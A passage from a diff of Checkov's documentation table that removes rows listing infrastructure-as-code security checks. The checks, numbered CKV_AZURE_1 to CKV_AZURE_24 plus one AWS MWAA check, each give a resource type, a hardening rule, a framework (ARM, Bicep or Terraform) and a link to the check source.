-| 1507 | CKV2_AWS_66 | resource | aws_mwaa_environment | Ensure MWAA environment is not publicly accessible | Terraform | [AWS_private_MWAA_environment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWS_private_MWAA_environment.yaml) |
-| 1508 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | arm | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) |
-| 1509 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) |
-| 1510 | CKV_AZURE_1 | resource | 
azurerm_linux_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) |
-| 1511 | CKV_AZURE_1 | resource | azurerm_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) |
-| 1512 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | arm | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) |
-| 1513 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | Bicep | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) |
-| 1514 | CKV_AZURE_2 | resource | azurerm_managed_disk | Ensure Azure managed disk has encryption enabled | Terraform | [AzureManagedDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryption.py) |
-| 1515 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | arm | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsTransportEncryption.py) |
-| 1516 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | Bicep | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountsTransportEncryption.py) |
-| 1517 | CKV_AZURE_3 | resource | 
azurerm_storage_account | Ensure that 'enable_https_traffic_only' is enabled | Terraform | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsTransportEncryption.py) |
-| 1518 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | arm | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) |
-| 1519 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | Bicep | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) |
-| 1520 | CKV_AZURE_4 | resource | azurerm_kubernetes_cluster | Ensure AKS logging to Azure Monitoring is Configured | Terraform | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLoggingEnabled.py) |
-| 1521 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | arm | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) |
-| 1522 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | Bicep | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) |
-| 1523 | CKV_AZURE_5 | resource | azurerm_kubernetes_cluster | Ensure RBAC is enabled on AKS clusters | Terraform | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py) |
-| 1524 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | arm | 
[AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) |
-| 1525 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | Bicep | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) |
-| 1526 | CKV_AZURE_6 | resource | azurerm_kubernetes_cluster | Ensure AKS has an API Server Authorized IP Ranges enabled | Terraform | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSApiServerAuthorizedIpRanges.py) |
-| 1527 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | arm | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) |
-| 1528 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | Bicep | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) |
-| 1529 | CKV_AZURE_7 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Network Policy configured | Terraform | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNetworkPolicy.py) |
-| 1530 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | arm | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) |
-| 1531 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | Bicep | 
[AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) |
-| 1532 | CKV_AZURE_8 | resource | azurerm_kubernetes_cluster | Ensure Kubernetes Dashboard is disabled | Terraform | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py) |
-| 1533 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) |
-| 1534 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) |
-| 1535 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) |
-| 1536 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) |
-| 1537 | CKV_AZURE_9 | resource | azurerm_network_security_group | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) |
-| 1538 | CKV_AZURE_9 | resource | azurerm_network_security_rule | Ensure that RDP access is restricted from the internet | Terraform | 
[NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) |
-| 1539 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) |
-| 1540 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) |
-| 1541 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) |
-| 1542 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) |
-| 1543 | CKV_AZURE_10 | resource | azurerm_network_security_group | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) |
-| 1544 | CKV_AZURE_10 | resource | azurerm_network_security_rule | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) |
-| 1545 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow 
ingress from 0.0.0.0/0 (ANY IP) | arm | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) |
-| 1546 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Bicep | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) |
-| 1547 | CKV_AZURE_11 | resource | azurerm_mariadb_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) |
-| 1548 | CKV_AZURE_11 | resource | azurerm_mysql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) |
-| 1549 | CKV_AZURE_11 | resource | azurerm_postgresql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) |
-| 1550 | CKV_AZURE_11 | resource | azurerm_sql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) |
-| 1551 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) |
-| 1552 | CKV_AZURE_12 | resource | 
Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) |
-| 1553 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) |
-| 1554 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) |
-| 1555 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) |
-| 1556 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) |
-| 1557 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) |
-| 1558 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that 
Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) |
-| 1559 | CKV_AZURE_12 | resource | azurerm_network_watcher_flow_log | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Terraform | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkWatcherFlowLogPeriod.py) |
-| 1560 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) |
-| 1561 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) |
-| 1562 | CKV_AZURE_13 | resource | azurerm_app_service | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) |
-| 1563 | CKV_AZURE_13 | resource | azurerm_linux_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) |
-| 1564 | CKV_AZURE_13 | resource | azurerm_windows_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) |
-| 1565 | CKV_AZURE_13 | 
resource | config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) |
-| 1566 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) |
-| 1567 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | arm | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) |
-| 1568 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Bicep | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) |
-| 1569 | CKV_AZURE_14 | resource | azurerm_app_service | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) |
-| 1570 | CKV_AZURE_14 | resource | azurerm_linux_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) |
-| 1571 | CKV_AZURE_14 | resource | azurerm_windows_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) |
-| 1572 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS 
encryption | arm | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) |
-| 1573 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | Bicep | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) |
-| 1574 | CKV_AZURE_15 | resource | azurerm_app_service | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) |
-| 1575 | CKV_AZURE_15 | resource | azurerm_linux_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) |
-| 1576 | CKV_AZURE_15 | resource | azurerm_windows_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) |
-| 1577 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | arm | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) |
-| 1578 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | Bicep | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) |
-| 1579 | CKV_AZURE_16 | resource | azurerm_app_service | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | 
[AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) |
-| 1580 | CKV_AZURE_16 | resource | azurerm_linux_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) |
-| 1581 | CKV_AZURE_16 | resource | azurerm_windows_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) |
-| 1582 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | arm | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) |
-| 1583 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Bicep | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) |
-| 1584 | CKV_AZURE_17 | resource | azurerm_app_service | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) |
-| 1585 | CKV_AZURE_17 | resource | azurerm_linux_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) |
-| 1586 | CKV_AZURE_17 | resource | azurerm_windows_web_app | Ensure the web 
app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | -| 1587 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | arm | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | -| 1588 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | Bicep | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | -| 1589 | CKV_AZURE_18 | resource | azurerm_app_service | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | -| 1590 | CKV_AZURE_18 | resource | azurerm_linux_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | -| 1591 | CKV_AZURE_18 | resource | azurerm_windows_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | -| 1592 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | arm | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | -| 1593 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | 
Ensure that standard pricing tier is selected | Bicep | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | -| 1594 | CKV_AZURE_19 | resource | azurerm_security_center_subscription_pricing | Ensure that standard pricing tier is selected | Terraform | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py) | -| 1595 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | arm | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | -| 1596 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | Bicep | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | -| 1597 | CKV_AZURE_20 | resource | azurerm_security_center_contact | Ensure that security contact 'Phone number' is set | Terraform | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py) | -| 1598 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | -| 1599 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | -| 1600 | 
CKV_AZURE_21 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlert.py) | -| 1601 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | -| 1602 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | -| 1603 | CKV_AZURE_22 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py) | -| 1604 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | -| 1605 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 1606 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | 
[SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 1607 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | -| 1608 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 1609 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 1610 | CKV_AZURE_23 | resource | azurerm_mssql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | -| 1611 | CKV_AZURE_23 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | -| 1612 | CKV_AZURE_23 | resource | azurerm_sql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | -| 1613 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 
